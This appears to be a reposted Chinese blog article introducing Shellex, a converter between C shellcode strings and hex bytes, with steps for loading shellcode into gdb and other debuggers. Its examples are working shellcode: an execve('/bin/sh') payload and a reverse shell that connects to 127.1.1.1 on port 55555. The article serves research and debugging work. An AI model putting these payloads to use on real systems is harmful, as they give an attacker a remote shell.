Shellex
Shellex是一款功能强大的C-shellcode转换器,可以帮助广大研究人员将C-shellcode转换为十六进制代码,并且能够在gdb、windbg、radare2、ollydbg、x64dbg、immunity调试器和010编辑器中粘贴和执行shellcode。
在Shellex的帮助下,广大研究人员可以将C-shellcode代码转换为十六进制代码,并且还可以在C编译器中编译时进行转换,整个过程只需要执行Shellex,并将shellcode代码拷贝进去并按下回车键即可。
比如说,我们可以转换多行混合了ASCII代码的C-shellcode(注意混合部分\x68//sh\x68/bin\x89):
“\x6a\x17\x58\x31\xdb\xcd\x80”
“\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80”

Shellex输出如下:
6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
转换包含注释代码的C-shellcode:
“\x68”
“\x7f\x01\x01\x01” // <- IP: 127.1.1.1
“\x5e\x66\x68”
“\xd9\x03” // <- Port: 55555
“\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02”
“\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79”
“\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a”
“\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f”
“\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53”
“\xeb\xce”

Shellex输出如下:
68 7F 01 01 01 5E 66 68 D9 03 5F 6A 66 58 99 6A 01 5B 52 53 6A 02 89 E1 CD 80 93 59 B0 3F CD 80 49 79 F9 B0 66 56 66 57 66 6A 02 89 E1 6A 10 51 53 89 E1 CD 80 B0 0B 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 EB CE
如果你需要Shellex输出新的C-shellcode字符串,可以使用-h参数,比如说:
./shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80

Shellex安装
首先,广大研究人员需要使用下列代码将该项目源码克隆至本地:
git clone https://github.com/David-Reguera-Garcia-Dreg/shellex.git
针对Windows:
shellex\bins\shellex.exe
针对Linux:
sudo apt-get install tcc
shellex/linuxbins/shellex
在gdb中复制和执行shellcode
首先,我们需要运行Shellex。
接下来,输入我们的shellcode:
“\x6a\x17\x58\x31\xdb\xcd\x80”
“\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80”
按下回车键后,再按下Control+D键。
使用shellex -h命令将Shellex输出转换为C-Hex字符串:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
将C-Hex字符串以源码形式(包含“echo”命令)写入至文件:
echo -ne “\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80” > /tmp/sc

接下来,将源码文件写入当前指令指针。
32位:
rstore /tmp/sc binary $eip
x/30b $eip
x/15i $eip
64位:
restore /tmp/sc binary $rip
x/30b $rip
x/15i $rip
x/30b是shellcode的字节大小,我们可以使用下列命令获取到大小值:
wc -c /tmp/sc
x/15i是显示的指令数量,我们可以使用ndisasm获取正确的数量:
sudo apt-get install nasm
32位:
ndisasm -b32 /tmp/sc
ndisasm -b32 /tmp/sc | wc -l
64位:
ndisasm -b64 /tmp/sc
ndisasm -b64 /tmp/sc | wc -l
无交互模式
在Linux中转换“\x6a\x17\x58\x31\xdb\xcd\x80”:
echo “”\x6a\x17\x58\x31\xdb\xcd\x80"" | shellex
在Windows中转换“\x6a\x17\x58\x31\xdb\xcd\x80”:
echo “\x6a\x17\x58\x31\xdb\xcd\x80” | shellex.exe

Windows下写入多行文件:
C:\Users\Dreg\Desktop\shellex\bins>type sc.txt
“\x6a\x17\x58\x31\xdb\xcd\x80”
“\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80”
C:\Users\Dreg\Desktop\shellex\bins>type sc.txt | shellex.exe
Linux下写入多行文件:
dreg@fr33project# cat sc.txt
“\x6a\x17\x58\x31\xdb\xcd\x80”
“\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80”
dreg@fr33project# cat sc.txt | shellex

项目地址
Shellex:https://github.com/David-Reguera-Garcia-Dreg/shellex

Shellex:针对shellcode的转换与处理工具相关推荐

  1. OC实用转换model的工具

    OC实用转换model的工具 说明 这是本人写的一个专门用来将json数据直接转换生成Model文件的工具,目的是为了让你从写Model文件的繁琐过程中解脱出来,提升效率以及减少出错的几率,工具的特点 ...

  2. Excel转换成Json工具

    Excel转换成Json工具: 可执行版本下载:https://github.com/neil3d/excel2json/releases 完整项目源代码下载:https://github.com/n ...

  3. python种颜色循环_Python 实现一个颜色色值转换的小工具

    需求说明 公司的 UI 设计小哥,已经转用 Zeplin 很久了.Zeplin 的设计稿展示页面的颜色色值使用十进制的 RGB 表示的,在 Android 中的颜色表示大多情况下都需要十六进制的 RG ...

  4. html转换成pdf工具-wkhtmltopdf、Python生成PDF(pdfkit库)

    文章目录 一.html转换成pdf工具-wkhtmltopdf 1. 什么是wkhtmltopdf 2. 如何使用它? 3. 常见问题 error while loading shared libra ...

  5. 免费实用的jpg转换成pdf工具

    免费实用的jpg转换成pdf工具 现在作文职的各种格式的转换都能遇到,不知大家都是用什么样的方法将JPG转为PDF,小图的情况下可以将之复制粘贴在Word文档中,然后保存为PDF格式,可是如果图很大很 ...

  6. ppt转换成pdf工具

    ppt转换成pdf工具 前言:朋友在微博给我留言,让我帮忙把ppt文件转换成pdf,当时也是信口开河,认为直接下载几个转换软件就能马上搞定,但是,一测试却发现,转换之后的文本不是出现了乱码就是转换不出 ...

  7. sw中的转换实体引用工具的使用

    sw中的转换实体引用工具的使用 在使用sw建模时经常会遇到需要制作与另某一平面相等的草图,直接制作麻烦且不够准确.这时我们可采用转换实体引用.快速转换成草图,再进行绘制. 例如图中零件,需要在零件上中 ...

  8. Capture One pro 21 for Mac(RAW转换和图像编辑工具)

    Capture One pro 21 for Mac一款RAW转换和图像编辑工具,新版本Capture One Pro 21 mac着重在图层.工作流程及处理性能三方面作出改进,带来了全新且高度灵敏的 ...

  9. PDF转换图片小工具(高清 、免费、无水印、支持随意页数)

    生活中经常用到PDF转换成图片使用比如发票的PDF文档和工作中的PDF文档,今天刚好有空借着空闲的时间做个PDF转换图片的工具分享给大家. 特点:操作简单,转换速度快 免费.支持文件名自定义 生成路径 ...

  10. adobe 发布 flash 转换成 html5 工具 代号wallaby(沙袋鼠)-as3-javaeye技术网站

    adobe 发布 flash 转换成 html5 工具 代号wallaby(沙袋鼠)-as3-javaeye技术网站 2011年03月01日 Adobe 今日 发布了Flash 到 HTML5的一键转 ...

最新文章

  1. 基于点云曲率的图像特征提取方法
  2. Java字符串真的不可变吗?
  3. note js 创建项目_vue.js使用vuecli3快速创建项目
  4. 朴素的串模式匹配(C语言实现)【串模式匹配】
  5. fastxml 大于符号不转换_你可能不知道的MATLAB入门技巧#第二话
  6. Avalonia跨平台入门第六篇之Grid动态分割
  7. android intent参数是上次的结果,【Android】7.0 Intent向下一个活动传递数据、返回数据给上一个活动...
  8. return中断方法和Unreachable code(永远达不到的代码)
  9. python functools.reduce_Python之functools.reduce使用
  10. matlab求两向量夹角_高等数学之向量代数与空间解析几何知识点与题型总结
  11. Unity3D 2018版本 Post Process 后期处理插件使用介绍
  12. 大数据产品推荐:神策分析——可私有化部署的用户行为分析平台
  13. Springboot集成Activiti7
  14. iPhone密码管理
  15. java使用aspose打印pdf、word文件
  16. strongswan与sangfor的ikev2配置
  17. 通过php上传和下载rar/zip压缩文件
  18. 科拉茨猜想c语言编写,辽宁省沈阳市第一七O中学2019-2020学年高二数学上学期阶段性测试试题(2)文...
  19. FA-Oracle ERP 资产模块的非常规功能探讨
  20. Day2-go搭载vscode出现的问题

热门文章

  1. spring mvc+myibatis项目大致框架-spring mvc wendang
  2. 摩托罗拉里程碑2刷android 2.3.4
  3. SCCM 2007 R7使用手记
  4. python 例子 银行_Python3 适合初学者学习的银行账户登录系统实例
  5. opengl 如何加阴影_一步步学OpenGL(23) -《阴影贴图1》
  6. 关于man命令后面加数字
  7. nyoj Splits the string 749
  8. 学习记录 php,php 学习记录
  9. set_union()和set_intersection()用法:原来并集和交集这样求!
  10. linux下实用小脚本,linux下shell常用脚本大集合啦